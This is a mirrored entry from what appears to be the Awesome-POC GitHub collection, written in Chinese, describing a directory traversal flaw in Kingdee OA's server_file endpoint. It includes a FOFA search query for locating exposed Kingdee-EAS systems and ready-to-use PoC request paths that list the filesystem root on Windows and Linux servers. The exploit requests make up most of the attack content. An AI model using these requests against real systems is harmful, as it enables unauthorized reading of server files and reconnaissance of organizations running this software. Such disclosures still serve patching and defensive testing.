admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

609 B
Raw Blame History

金蝶OA server_file 目录遍历漏洞

漏洞描述

金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息

漏洞影响

金蝶OA

FOFA

app="Kingdee-EAS"

漏洞复现

登录界面为

1

漏洞POC

/appmonitor/protected/selector/server_file/files?folder=/&suffix=

# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=

# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=

2